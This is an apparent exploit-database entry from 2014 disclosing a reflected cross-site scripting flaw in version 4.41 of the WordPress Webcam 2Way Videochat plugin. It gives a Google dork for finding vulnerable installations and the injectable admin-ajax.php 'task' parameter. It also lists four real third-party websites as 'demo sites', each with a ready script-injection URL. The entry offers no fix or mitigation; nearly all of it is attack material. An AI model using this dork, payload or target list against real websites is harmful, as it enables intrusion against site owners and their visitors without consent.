Wordpress Webcam 2Way Videochat Plagin XSS Vulnerability

2014-09-17T00:00:00
ID 1337DAY-ID-22649
Type zdt
Reporter null_pointer
Modified 2014-09-17T00:00:00

Description

The VideoWhisper 2 Way Video Chat is a web based video application designed for instant 1 on 1 private online video conferencing.

                                        
                                            Exploit Title : Wordpress Plugin Webcam 2Way Videochat XSS Vulnerability

Exploit Author : NULL_Pointer

Date : 17/09/2014

Download Link : http://downloads.wordpress.org/plugin/webcam-2way-videochat.zip

Version: 4.41

Google Dork : inurl:"/wp-content/plugins/webcam-2way-videochat/"

Tested on : Windows 7
----------------------------------------------------------

WordPress Webcam 2Way Videochat plugin suffers from a Cross Site Scripting (XSS) vulnerability.

Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=v2wvc&task=[XSS_HERE]

Demo Sites :

http://bogovete.com/wp-admin/admin-ajax.php?action=v2wvc&task=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E
http://pikaritas.com/wp-admin/admin-ajax.php?action=v2wvc&task=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E
http://zhangzining.net/wordpress/wp-admin/admin-ajax.php?action=v2wvc&task=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E
http://www.videochat-scripts.com/wp-admin/admin-ajax.php?action=v2wvc&task=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E

#  0day.today [2018-04-14]  #